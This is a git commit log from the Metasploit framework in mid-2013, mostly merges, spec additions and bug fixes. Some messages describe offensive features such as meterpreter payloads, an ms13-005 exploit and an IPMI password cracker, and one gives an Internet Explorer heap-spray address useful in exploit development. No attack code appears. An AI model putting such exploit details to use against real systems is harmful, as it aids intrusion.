sinn3r
92d57ef37d
Fix merge conflict
...
Conflicts:
msfvenom
2013-08-13 00:00:16 -05:00
James Lee
3827b14103
Land #1726, ssl verify mode
...
Conflicts:
lib/rex/socket/parameters.rb
Fix doc strings
2013-08-12 17:57:10 -05:00
jvennix-r7
8278808a37
Merge pull request #2204 from todb-r7/bug/undo-optstring-validator
...
Revert "OptString specs and better validation"
2013-08-09 13:42:46 -07:00
Tod Beardsley
02f460287b
Revert "OptString specs and better validation"
...
This reverts commit d66779ba4c.
Specifically, this commit was causing trouble when a datastore was
getting an Integer. For some reason (as yet undiscovered), the option
normalizer wasn't trying to Integer#to_s such arguments.
This kind of thing is going to happen a lot. For now, I'd rather just
end up with the ducktype, and attack the normalizer in a separate fix.
2013-08-09 15:30:42 -05:00
sinn3r
4558aca7ca
Land #2136 - Removed requirement for note.data to be present
2013-08-09 15:29:25 -05:00
Meatballs
08c32c250f
File versions
2013-08-08 19:42:14 +01:00
James Lee
ab976ddf8f
Fix generate command in msfconsole
...
Thanks @Meatballs1 for spotting
2013-08-06 14:46:53 -05:00
Spencer McIntyre
2d69174c5b
Initial commit of the python meterpreter.
2013-08-05 23:38:49 -04:00
allfro
9180dd59fe
Patch for string encoding issues with `msgpack`
...
Fixes an issue that causes exploits to fail if the PAYLOAD option is the last option to get marshalled in an MSFRPC dictionary. The patch adjusts the string's encoding to match the internal default encoding used by Ruby. Hence, making `fetch()` succeed.
2013-07-30 13:38:44 -04:00
Tod Beardsley
7e539332db
Reverting disaster merge to 593363c5f with diff
...
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).
What this commit does is simulate a hard reset, by doing this:
git checkout -b reset-hard-ohmu
git reset --hard 593363c5f9
git checkout upstream-master
git checkout -b revert-via-diff
git diff --no-prefix upstream-master..reset-hard-ohmy > patch
patch -p0 < patch
Since there was one binary change, also did this:
git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf
Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
jvazquez-r7
05be76ecb7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-29 16:41:22 -05:00
jvazquez-r7
593363c5f9
Land #2154, @wchen-r7's msfcli optimizations and refactoring
2013-07-29 16:38:32 -05:00
jvazquez-r7
455569aee8
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-29 12:10:12 -05:00
jvazquez-r7
0851974408
Land #2162, @Meatballs1's exploit for ms13-005
2013-07-29 11:43:31 -05:00
Meatballs
9ad99ed4ca
I am a git genius
2013-07-29 17:01:57 +01:00
Meatballs
0329caec5f
Revert "Fixup psh datastore"
...
This reverts commit aa64f5cd58.
2013-07-29 17:00:28 +01:00
Meatballs
aa64f5cd58
Fixup psh datastore
2013-07-28 21:53:11 +01:00
sinn3r
a0decf502f
Refactor msfcli
2013-07-28 12:40:50 -05:00
Meatballs
234e49d982
Add type technique
2013-07-26 23:33:16 +01:00
Meatballs
b99ad41a64
Add api constants and tidy
2013-07-26 01:48:39 +01:00
jvazquez-r7
4a0b33241f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 18:41:50 -05:00
sinn3r
7b7603a5e7
Land #2104 - reverse_https_proxy
2013-07-25 17:26:56 -05:00
Meatballs
0235e6803d
Initial working
2013-07-25 23:24:11 +01:00
jvazquez-r7
33f6f7e8fc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 17:03:45 -05:00
William Vu
27a540e12f
Land #1215, creds reuse for AuthBrute modules
2013-07-25 16:54:44 -05:00
William Vu
dac9ac4a1d
Land #2159, spool command nil dereference fix
2013-07-25 15:38:35 -05:00
James Lee
a5ca516435
Fix nil deref in spool command
...
Occurs when no module is currently `use`d
2013-07-25 14:51:39 -05:00
Meatballs
1d2d4b5345
Add some null checks
2013-07-25 18:35:11 +01:00
jvazquez-r7
2b3dcaf678
Land #2157, @wvu and @averagesecurityguy patch for OpenVAS XML Reports importing
2013-07-25 12:04:38 -05:00
William Vu
97680304d6
Use index, since it can apparently do regex
2013-07-25 12:00:33 -05:00
jvazquez-r7
5014919198
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 09:02:20 -05:00
sinn3r
56367ef69c
Update documentation
2013-07-24 19:04:47 -05:00
sinn3r
0fd2c385fb
Update documentation
2013-07-24 19:02:10 -05:00
sinn3r
e266d1bd0a
Add comment about opts
2013-07-24 19:00:58 -05:00
sinn3r
a71d7eb372
Update archive.rb to handle whitelist
2013-07-24 18:59:43 -05:00
sinn3r
9ae550c883
Do if [].empty?. Avoid msfcli running as a job
2013-07-24 18:35:06 -05:00
sinn3r
ed51d284fa
Change name, change how data is passed, fix rspec
2013-07-24 17:15:56 -05:00
jvazquez-r7
214f337f58
Fix indentation
2013-07-24 16:55:01 -05:00
Meatballs
c221360cc1
Retab
2013-07-24 22:16:41 +01:00
sinn3r
e120ecfba9
msfcli is designed to load only one module (auxiliary or exploit),
...
so we shouldn't have to load all of them to run this utility. The
overall goal of this PR is to narrow down what modules
(exploit/aux + payload + encoder + nop) you possibly need in order
to shave off loading time. By doing this, on my box this is 5-6
seconds faster than the original one.
I actually tried to avoid making too many changes in the library
(such as Module Manager), because we don't have test cases for them,
and we can't really afford to risk breaking it. I also developed
a test script to actually be able to test msfcli.
2013-07-24 14:40:46 -05:00
jvazquez-r7
e9a4f6d5da
Merge branch 'dll_fix' of https://github.com/Meatballs1/metasploit-framework
2013-07-24 14:00:52 -05:00
Meatballs
fee5fabb91
Revert x64 corruption changes
2013-07-24 19:59:04 +01:00
Meatballs
44cae75af1
Cleanup
2013-07-24 19:52:59 +01:00
Meatballs
edc297756b
Tabs
2013-07-24 19:14:11 +01:00
Meatballs
4b84b49674
Fix payload corruption
2013-07-24 19:08:02 +01:00
jvazquez-r7
47c21dfe85
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-24 11:42:11 -05:00
Tod Beardsley
00630376c3
Revert the default call to firefox
...
This reverts commit 0928a370f3.
No, no, you guys are right in the comments for #2148. The call to
system is inside the else, but the tabbing made my eyes cross.
Sorry about that. Someday soon, @tabassassin will save us all from these
kinds of screw ups in mental parsing.
2013-07-23 16:13:02 -05:00
William Vu
d493346691
Land #2137, fixes and specs for Opt containers
2013-07-23 15:58:09 -05:00
jvazquez-r7
b0c17fdebc
Land #2002, @jlee-r7's patch for better handling uri resources
2013-07-23 15:49:21 -05:00
David Maloney
621568bf8f
Another Error Type needs caught
...
Different systems throw a different error
Need to rescue that error too
2013-07-23 15:47:42 -05:00
William Vu
86ab942435
Land #2146, Unix and Windows path normalization
2013-07-23 15:23:41 -05:00
Tod Beardsley
0928a370f3
Adding back default firefox
...
the default is triggered only outside the case statement, which itself
is totally bizarre. I can't tell if anyone is relying on this behavior
right now, but it's too premature to just remove it out at this point.
2013-07-23 14:43:30 -05:00
Tod Beardsley
53c3fd2ce7
Update comment docs on Rex::Compat.open_browser
2013-07-23 14:38:04 -05:00
ZeroChaos
ce5742461a
update open_browser functionality
...
open_browser didn't support xdg-open or firefox-bin. xdg-open was made the default as it is the most likely to succeed afaik.
the fallback to firefox was removed because since we check for the existence of firefox it makes no sense to try to run it after we failed to find it. This will silently fail if no supported browser is found due to suggestions from the msf team:
< Zero_Chaos> more importantly, it would be great if someone told me how to spit out a message to the user
< Zero_Chaos> because I have no clue :-)
<@egypt> Zero_Chaos: it's in rex, so the answer is "don't"
2013-07-23 14:58:16 -04:00
Tod Beardsley
bb16683415
Land #2087, @egypt's random ID generator
2013-07-23 13:52:08 -05:00
sinn3r
958a4edd73
Keep the trailing slash if the user wishes
2013-07-22 20:46:18 -05:00
sinn3r
359009583f
Drop support for UNC path parsing in normalize_win_path
...
Not really a good idea to try to parse UNC format. Confuses the
purpose of the function.
2013-07-22 20:20:45 -05:00
sinn3r
4b3fce9349
Add functions to normalize Windows & Unix paths
...
The purpose of these functions is to be able to join file/dir paths
safely without trailing slashes, basically for the same reason as
normalize_uri. Some modules are really buggy when merging paths,
so instead of letting them do it, it's better to use these functions.
2013-07-22 19:26:04 -05:00
jvazquez-r7
99a345f8d1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-22 13:54:26 -05:00
jvazquez-r7
77e8250349
Add support for CWE
2013-07-22 12:13:56 -05:00
jvazquez-r7
15b0e39617
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-21 13:47:40 -05:00
David Maloney
943dde5c6c
OptRegexp specs
2013-07-20 18:44:55 -05:00
David Maloney
d66779ba4c
OptString specs and better validation
2013-07-20 17:49:03 -05:00
David Maloney
d6f2b28708
More opt specs
2013-07-20 17:37:39 -05:00
sinn3r
757cf18bb4
Land #2135 - Update FF detection
2013-07-20 13:10:14 -05:00
Samuel Huckins
832db57171
Removed requirement for note.data to be present. It wasn't required in
...
the model or in specs, but was in db.rb, resulting in an error during
certain import scenarios.
2013-07-20 10:27:12 -05:00
Joe Vennix
92ae90b828
Whitespace fixes.
2013-07-19 17:27:27 -05:00
Joe Vennix
2e838d7be3
Fix minor bugs discovered when testing.
2013-07-19 17:18:39 -05:00
Joe Vennix
7e2fc147f1
Add updated versions of firefox.
2013-07-18 16:35:57 -05:00
David Maloney
ec82644bd3
mo fixes mo specs
...
SEERM #7536
SEERM #7537
2013-07-18 15:00:57 -05:00
jvazquez-r7
1a5e0e10a5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-18 13:53:57 -05:00
sinn3r
9d92b38dc7
Land #2121 - add specs for module search filter
2013-07-18 13:50:26 -05:00
Joe Vennix
67d8c1170b
Remove unnecessary whitespace.
2013-07-18 13:43:30 -05:00
David Maloney
57dd525714
More optaddressrange specs and fixes
...
SEERM #7536
2013-07-18 13:03:32 -05:00
Joe Vennix
f4b0ab8184
Adds 141 passing specs to Msf::Module#search_filter.
...
* tests exclusion functionality, type: matching, port: matching, app: matching,
platform: matching, author: matching, text: matching, name: matching, and
path: matching.
[RM #4790]
2013-07-18 12:47:08 -05:00
David Maloney
22e4db04e0
opening specs and fixes for OptAddressRange
2013-07-18 12:44:48 -05:00
David Maloney
27e2469d8e
Specs and code changes for OptAddress
...
handles weirdness around Optaddress.
Still need to address issues in optaddressRange
FIXRM #7537
2013-07-17 20:21:24 -05:00
jvazquez-r7
58229ff8b7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 20:18:48 -05:00
sinn3r
7f7cb4f59a
Land #2114 - Fix object detection for '5716599'
...
[FixRM 7252]
2013-07-17 18:23:17 -05:00
Tod Beardsley
72df070b80
Bump version to 4.8.0-dev, -rls is so fleeting
2013-07-17 16:43:24 -05:00
Tod Beardsley
8d1a760b1f
Bump version to -rls
2013-07-17 16:42:37 -05:00
James Lee
9d56e58e84
Rely on object detection for '5716599'
...
[SeeRM #7252]
2013-07-17 15:47:25 -05:00
jvazquez-r7
458ac5f289
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 15:02:33 -05:00
jvazquez-r7
11f8b351c0
Merge branch 'nvidia' of https://github.com/Meatballs1/metasploit-framework
2013-07-17 11:44:42 -05:00
William Vu
54af2929f5
Land #2109, kill stray character
2013-07-16 11:11:06 -05:00
Joe Vennix
34e732eabd
Kill stray character in whitespace gutter.
2013-07-16 10:14:41 -05:00
Alexandre Maloteaux
a5d526d710
remove metsrv.dll
2013-07-15 17:16:21 +01:00
Alexandre Maloteaux
e28dd42992
add http authentication and socks
2013-07-15 15:36:58 +01:00
William Vu
fdd577598a
Land #2095, go_pro fix for Kali
2013-07-15 04:27:56 -05:00
Alexandre Maloteaux
f48c70d468
enable tor and small fix
2013-07-13 17:59:49 +01:00
James Lee
94f8b1d177
Land #2073, psexec_psh
2013-07-12 16:14:17 -05:00
James Lee
91b748a701
Make it clear where we failed
...
Even when VERBOSE=false
2013-07-12 15:57:30 -05:00
corelanc0d3r
e8983a21c5
New meterpreter payload reverse_https_proxy
2013-07-12 16:45:16 -04:00
William Vu
e8294b4f02
Add tentative fixes
2013-07-12 07:12:07 -05:00
James Lee
1ac1d322f2
Dup before modifying
...
Because `remove_resource` modifies @my_resources, we can't call it while
iterating over the actual @my_resources. The following snippet
illustrates why:
```
>> a = [1,2,3,4]; a.each {|elem| a.delete(elem); puts elem }
1
3
=> [2, 4]
```
[See #2002]
2013-07-12 00:57:10 -05:00
James Lee
38e837dc28
Remove inaccurate comment
2013-07-11 22:48:35 -05:00
g0tmi1k
a4d96d37f3
Updated regex
2013-07-11 21:16:02 +01:00
g0tmi1k
ff62a85501
command_dispatcher/core.rb - Made msftidy happy
2013-07-11 10:52:25 +01:00
g0tmi1k
b2fe31e30f
go_pro - fix start with kali linux
2013-07-11 10:42:26 +01:00
RageLtMan
9445cb74bf
fix copypasta
2013-07-10 21:03:49 -04:00
RageLtMan
f7cf783e25
Allow selection (and ordering) of column names
...
Build the creds table with only the columns we select,
in the order selected.
Example:
creds -s ssh -u root -S pubk -c port,user,proof
Credentials
===========
port user proof
---- ---- -----
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=a6:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=a6:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=a6:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=a6:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=30:...
22 root KEY=37:...
22 root KEY=a6:...
22 root KEY=30:...
22 root KEY=37:...
2013-07-10 20:46:34 -04:00
RageLtMan
987d6a671f
Allow passing MaxChar to Rex::Ui::Text::Table cols
...
Passing MaxChar allows setting the maximum number of characters
printed within a specific column during the row_to_s method.
This does not affect CSV output nor truncate the actual data.
Meant for tidying up long console output.
Example: cleaned up cmd_creds to show proof and not maul tables
with unix session data.
2013-07-10 20:00:40 -04:00
William Vu
f267c11bc4
Add regex fix
2013-07-10 15:43:16 -05:00
James Lee
85affe4d47
Land #2089, smb last_filename can be nil
2013-07-10 14:18:00 -05:00
Tod Beardsley
56ffa4ae2f
Fixes for network_interface PR #2085
...
Implementing the suggestions from @limhoff-r7.
See #2085
FixRM #8023
FixRM #7943
2013-07-10 13:25:06 -05:00
Tod Beardsley
8ade33552c
Land #2085, use the new network_interface gem.
2013-07-10 13:15:01 -05:00
James Lee
4cc179a24c
Store inverted hash for better lookups
...
Also clarifies comment about infinite loops
2013-07-10 12:38:42 -05:00
sinn3r
71974a8535
to_addr_hex_dump is never used and is too similar to to_hex_dump
...
Not so much value in to_addr_hex_dump, as Meatballs1 suggested, we
should remove this.
2013-07-10 11:09:47 -05:00
sinn3r
add294d999
Fix potential nil in last_filename
...
Replacing #2060. It is possible to get a nil in last_filename if
the sub! function doesn't find any 0x00s to replace, so instead
it's best to use sub(), which should at least return the original
filename. To make sure we don't hit any other unknown conditions
that may result in nil last_filename, it's also converted with to_s
to make sure it's always a string.
2013-07-09 12:50:19 -05:00
James Lee
afa6a36df3
Make first char's character class configurable
2013-07-09 02:50:28 -05:00
James Lee
273046d8f0
Add a class for generating random identifiers
...
Will be useful for all kinds of things, but brought about in discussions
specifically for Util::EXE in #2037.
2013-07-09 02:06:44 -05:00
lsanchez-r7
4541a9e49e
now with passing msftidy
2013-07-08 17:44:50 -05:00
lsanchez-r7
5c93fb2849
arp_sweep is once again working
...
modified the capture mixin to use NetworkInteface instead of
pcaprub for interfaces and addresses
FIXRM #8023,#7943
2013-07-08 17:24:28 -05:00
James Lee
00c7581099
Fix constant names and 'exe-only'
...
That'll teach me to commit before the specs finish.
Really [FixRM #8149]
2013-07-06 12:39:15 -05:00
James Lee
1b504197be
Check equality instead of regex
...
Thanks, @Meatballs1 for finding the cause of this bug!
[FixRM #8149]
2013-07-06 12:29:37 -05:00
Meatballs
2bfe8b3b29
msftidy
2013-07-05 22:35:22 +01:00
Meatballs
0ce3fe2e7c
Added service status checks to Post::Windows::Services
...
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
2013-07-05 22:25:04 +01:00
jvazquez-r7
0e2380c115
Fix method documentation
2013-07-05 11:19:53 -05:00
jvazquez-r7
bcf6d11442
Land #2049 , @wchen-r7's had_pid? method work
2013-07-05 11:19:11 -05:00
Meatballs
1a0bdf335e
Retab lib
2013-07-04 12:09:46 +01:00
Meatballs
a76ee6c2ec
Add flexibility to lib
2013-07-04 11:03:48 +01:00
Meatballs
1368c1c27f
Move options to lib
2013-07-04 10:25:08 +01:00
Meatballs
03de8c1c3d
Pull in exploit/powershell
2013-07-04 09:54:40 +01:00
James Lee
e330916744
Pull out common stuff in Util::EXE/MsfVenom tests
2013-07-03 12:25:15 -05:00
g0tmi1k
38b83ba335
ui/banner~Made msftidy happy
2013-07-03 00:29:42 +01:00
William Vu
67f30a6828
Land #1739, resolve workspace rename issues
2013-07-02 16:09:59 -05:00
sinn3r
0f37bbe78e
Add has_pid? function
...
[SeeRM:#8123] - Add commonly used function has_pid?. Related to
redmine issue 8123.
2013-07-02 14:33:15 -05:00
William Vu
28a4a05991
Land #2046, base argument for to_hex_dump
2013-07-02 12:11:05 -05:00
sinn3r
98c214d2fb
Allow 0 base address, and dynamic left column length
2013-07-02 11:40:23 -05:00
jvazquez-r7
2ceb404f7d
Land #2047, @hmoore-r7 ipmi related work
2013-07-02 11:13:25 -05:00
sinn3r
9eb32ea9af
Allow "base" argument for to_hex_dump
...
[SeeRM:#8121] - For debugging purposes, it's useful to be able to
specify a base.
2013-07-01 23:56:51 -05:00
jvazquez-r7
2751470c71
Add @jlee-r7's feedback to sapni proxies support
2013-07-01 21:37:53 -05:00
jvazquez-r7
9c4d869ed8
Land #1018, @nmonkee's support for sap router proxies
2013-07-01 21:36:02 -05:00
James Lee
1466609c86
Add more supported formats to exe generation
...
- Already supported, just added calls to the right methods in
the .to_executable_fmt method:
- Linux armle, mipsle, and mipsbe
- Mac arm, ppc
- makes the two (!?) copies of block_api for windows match more closely
with the source used elsewhere. This still needs to be refactored
to get rid of the duplication.
- Get rid of some of the logic in msfvenom duplicated from Util::EXE
2013-07-01 17:36:58 -05:00
HD Moore
8e4dd29a4c
Add cipher zero scanner
2013-06-30 02:35:37 -05:00
jvazquez-r7
a5c3f4ca9b
Modify ruby code according to comments
2013-06-29 08:54:00 -05:00
sinn3r
e3989ad30c
Extra comments, no thanks
2013-06-28 15:44:06 -05:00
sinn3r
f4c805f5d6
Yarrrrrrrrd
2013-06-28 15:42:56 -05:00
sinn3r
6e1fa05757
Fix a handle leak & change thread creation flag
2013-06-28 13:23:08 -05:00
sinn3r
554d738f26
Update documentation
...
Fix broken English
2013-06-28 13:03:05 -05:00
sinn3r
b7430cb569
Add Msf::Post::Windows::Process
...
The purpose of Msf::Post::Windows::Process is to have all the common
functions you might need to do something to a process, for example:
injecting something to a process and then run it.
2013-06-28 12:55:06 -05:00
David Maloney
ea13ac48ec
"fix" indentation to make egypt happy
2013-06-27 17:16:13 -05:00
David Maloney
89faba288d
damnit brandon turner
2013-06-27 17:12:37 -05:00
David Maloney
867be1257a
slight rearrangement
2013-06-27 17:09:20 -05:00
David Maloney
e3fde02eec
conditional wrapping
...
as per egypt's catch
2013-06-27 17:07:16 -05:00
David Maloney
70433820a9
fixes FD leak in RPC client
...
FD leak due to sockets not getting closed
on the rpc client
FIXRM #8107
2013-06-27 16:57:02 -05:00
Josh
d7eda343e9
fix typo in comment
...
change runing to running
2013-06-27 03:12:49 -05:00
HD Moore
4fb6fa67f2
Fix require for constants, trim useless fields from banner
2013-06-26 09:59:40 -05:00
HD Moore
84117e28a8
Remove stale constants.rb require
2013-06-26 09:52:15 -05:00
James Lee
31ad7b50a9
Fix write_file on FreeBSD
...
[SeeRM #8083]
2013-06-25 17:19:00 -05:00
James Lee
b3b94c7a73
Break packet classes into their own files
...
This makes the file structure match the class structure and makes the
source tree easier to grok.
2013-06-24 19:24:09 -05:00
HD Moore
1801a5a270
Better HP iLO compatibility (retry on session ID error)
2013-06-24 14:23:53 -05:00
Daniele Martini
c0fda81eb0
Removed options DB_ADD_ALL. Added options DB_ALL_PASS and DB_ALL_USERS
...
to add already known user and passwords to the lists.
2013-06-23 18:20:41 +02:00
HD Moore
c869112407
Cleanup, reporting, and automatic cracking
2013-06-23 01:35:31 -05:00
HD Moore
5656e0cb7a
Initial commit of IPMI library, scanner, & cracker
2013-06-22 23:38:28 -05:00
James Lee
3c42fe594e
No need to have rescue around a print
2013-06-21 15:55:43 -05:00
James Lee
2c12a43e77
Add a method for dealing with hardcoded URIs
2013-06-21 15:48:02 -05:00
James Lee
39d011780e
Move deletion into #remove_resource
...
Doing it here means that modules manually calling remove_resource won't
screw up the cleanup
2013-06-21 15:34:54 -05:00
James Lee
e8a92eb196
Keep better track of resources
...
[See #1623]
[SeeRM #7692]
2013-06-21 14:51:47 -05:00
Meatballs
6c62463f83
Add ipv6 resolution and remove nix
2013-06-20 22:17:31 +01:00
James Lee
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7
1aff778a79
Fix unpack
2013-06-18 09:06:44 -05:00
jvazquez-r7
8ae8f25d56
Land #1961, @wvu-r7's normalization of command_dispatcher/db.rb
2013-06-18 08:57:32 -05:00
jvazquez-r7
3f665ba5a0
Skip also max-age from cookies
2013-06-17 14:04:08 -05:00
HD Moore
819080a147
Enable rhost/rport option overrides in HttpClient
2013-06-17 11:45:01 -05:00
Meatballs
1637651bbb
Revert multilang test
2013-06-15 17:48:32 +01:00
Meatballs
62e335dab2
Resolve conflict
2013-06-15 17:40:37 +01:00
Meatballs
fc7d151273
Add multilang syscheck
2013-06-15 17:39:01 +01:00
William Vu
53077d4c1a
Add a newline before the delete message
2013-06-14 19:58:19 -05:00
William Vu
cfd05bc68f
Normalize comments
2013-06-14 17:32:33 -05:00
William Vu
0a9a8a57e3
Remove double newlines
2013-06-14 17:20:26 -05:00
William Vu
bb02cc8509
Normalize the syntax and output of db.rb
2013-06-14 17:11:47 -05:00
Tod Beardsley
d341b825d0
Rename dirbust option to conform to style
2013-06-14 12:58:08 -05:00
Tod Beardsley
2971e50d06
Land #1949 , make dirbusting optional for crawler
2013-06-14 11:54:28 -05:00
jvazquez-r7
f5b00512e0
Fix sap ni proxy, hopefully
2013-06-13 17:15:48 -05:00
Brandon Perry
3cb851e4e0
Merge remote-tracking branch 'todb-r7/fix-msftidy-1944' into csharp_payload
2013-06-12 17:29:00 -05:00
Brandon Perry
0f06e9b08c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into csharp_payload
2013-06-12 17:27:55 -05:00
Tasos Laskos
b509ac8504
Crawler mixin: Dirbusting opt moved to advanced
2013-06-13 00:04:31 +03:00
Tasos Laskos
b474cda4aa
Crawler/Anemone: Dirbusting now optional
...
[FIXRM #8030]
Anemone updated to make dirbusting optional (on by default) and the Crawler core
module updated to provide an option to do so.
2013-06-13 00:00:09 +03:00
Samuel Huckins
8287dd314f
Merge pull request #1941 from jlee-r7/http-server-inspect
...
Functional tests in msfconsole passing, as are MSF and Pro specs. References in Pro to items that appeared session related were either debug oriented or commented out.
2013-06-12 12:54:29 -07:00
Tod Beardsley
9c75d821d1
Fix up msftidy warnings on rex/text.rb
2013-06-12 11:17:58 -05:00
Brandon Perry
d0e1e4df0a
This commit adds support for C# byte arrays for the assembly payloads.
2013-06-11 19:27:06 -05:00
Brandon Turner
132769d415
Merge branch 'release'
2013-06-11 18:52:11 -05:00
Brandon Turner
72b3ea2be0
Merge pull request #1943 from shuckins-r7:bug/nx-asset-group-push
2013-06-11 18:41:49 -05:00
Samuel Huckins
d5be41617e
Uses raw-xml-v2 Nexpose export for Nexpose import as this adds device-id
...
back to XML schema and will result in hosts that can be pushed back to
Nexpose.
[Bug #51521175]
2013-06-11 18:37:02 -05:00
Tod Beardsley
6a5d1d06b2
Make the conditional correct for print_prefix
...
Fixes a bug introduced on #1936.
2013-06-11 16:16:17 -05:00
James Lee
af613ee254
Add a more readable #inspect
2013-06-11 15:22:49 -05:00
Tod Beardsley
f775a0bb01
Handle single quotes for OpenVAS import
2013-06-10 19:45:50 -04:00
AverageSecurityGuy
e05763149a
Fixed issue downloading XML reports
...
The XML report has an extra </report> tag which prevents the .text
method from working properly. I used the .to_s method instead.
I also moved the rescue statement because it was masking other errors
that were being raised.
2013-06-10 19:45:50 -04:00
Tod Beardsley
9a08090b0f
Inch toward making modules more testable
2013-06-10 16:02:19 -05:00
Tod Beardsley
d4e9431633
Add Gemfile entry for PacketFu
2013-06-10 14:18:05 -05:00
Tod Beardsley
7dafcc76df
Remove packetfu and pcaprub libraries
...
These should be handled by bundler's Gemfile.
2013-06-10 14:12:18 -05:00
Tod Beardsley
31faf65271
Land #1929, spool ui fix from @jsherwood0
2013-06-10 12:30:50 -05:00
John Sherwood
7ac5b6de53
Fix prompt and color issue with cmd_spool
...
Changing spool setting caused problems with prompt and color. This
fix makes the following changes:
- Saves the color setting and re-applies it to the new output console
- Sets the prompt in the same way that cmd_use does
2013-06-09 13:35:35 -04:00
David Maloney
6aa7c74fdd
make anemone also respect domain
2013-06-07 14:24:14 -05:00
David Maloney
78b2a0a2ac
add domain support to web spider
2013-06-07 12:41:20 -05:00
sinn3r
8e2de6d14f
Updates js_property_spray documentation
...
After many tests, it turns out address 0x0c0d2020 is the most
consistent location across various IE versions. For dev purposes,
it's rather important to have this documented somewhere.
Thanks to corelanc0d3r for the data.
2013-06-07 00:28:22 -05:00
sinn3r
9466022194
Land #1847 - Add sorting functionality to notes command
2013-06-05 12:17:54 -05:00
sinn3r
026c658260
Comply with the case-sensitive rule
2013-06-05 12:16:38 -05:00
David Maloney
2e26256217
was missing a nil check
2013-06-04 14:21:07 -05:00
David Maloney
c4475538e7
Report on TaskSession associations
...
add TaskSession objects so when we report
on a session, we know what Task created it, if there
was a task
2013-06-04 13:42:36 -05:00
sinn3r
937d7fb762
Landing #1835 - Fix a backwards disasm bug which stomps on the depth opt
2013-05-31 16:28:49 -05:00
sinn3r
df2140ea59
Add back the tmp include check according to bannedit's feedback
2013-05-31 16:26:52 -05:00
sinn3r
dacc73a60f
Improve readability based on Egypt's feedback
2013-05-31 16:24:27 -05:00
sinn3r
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
Luke Imhoff
cc60c95243
Rescue Errno::ENONENT when using File.mtime for memory cache
...
[#47720609]
2013-05-30 13:16:43 -05:00
Luke Imhoff
541d287e70
Merge branch 'master' into bug/module-load-cache-update
2013-05-30 12:59:50 -05:00
lsanchez-r7
8b488c3c6b
Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
...
Add session_port to the mdm object
SEERM #7281
2013-05-30 10:05:48 -07:00
James Lee
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989]
2013-05-29 16:27:33 -05:00
sinn3r
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
Tod Beardsley
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862, this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
James Lee
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
sinn3r
8cb1bdefb7
Landing #1849 - 32 and 64bit compatible to_winpe_only() function
2013-05-28 15:24:43 -05:00
Samuel Huckins
e20385dd9e
Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
...
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
James Lee
9843dc4cb4
Land #1708, android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
David Maloney
849d974463
Add session_port to the mdm object
...
Mdm::Session was not being passed the session_port
FIXRM #7281
2013-05-24 17:46:03 -05:00
Luke Imhoff
4ba571346e
Spec Msf::Simple::Framework#init_module_paths
...
[#47720609]
2013-05-24 12:33:42 -05:00
Luke Imhoff
c22178752e
Merge branch 'master' into bug/module-load-cache-update
2013-05-24 11:06:16 -05:00
sinn3r
e169ccab4f
Landing #1862 - Remove inline unit tests
2013-05-23 22:19:29 -05:00
sinn3r
cd947e2075
Landing #1861 - Implement check for auxiliary modules
...
[FixRM:#7975]
2013-05-23 22:10:54 -05:00
Luke Imhoff
1a487e476d
Merge branch 'master' into bug/module-load-cache-update
2013-05-23 14:23:14 -05:00
David Maloney
0f21861921
Add task handling to imports
...
allow imports to carry along task info
[Story #49167601]
2013-05-23 13:33:19 -05:00
Tod Beardsley
05916c079e
Inline unit tests are so last decade
...
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) separating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
Tod Beardsley
d44a158238
Land #1859, fix trailing newlines in zip.
...
This incidentally fixes #1755 for real, where most of the discussion
of this bug took place.
2013-05-23 12:00:48 -05:00
Tod Beardsley
a852304ba3
DRY: Move check things to the common module level
...
While it makes lots of sense to bring check to all modules, of course
some modules will not be able to actually use it. Namely modules like
nop and payload modules. If you're feeling creative, you could probably
come up with semantically similar checks for those, too.
2013-05-23 11:42:41 -05:00
Tod Beardsley
7436fdad72
First, copy-pasta and add a test
2013-05-23 11:26:53 -05:00
David Maloney
d8074c0bf4
Use create not new
...
Was calling .new instead of .create
[Story #49167601]
2013-05-22 18:29:22 -05:00
xard4s
527f969d8d
fix range
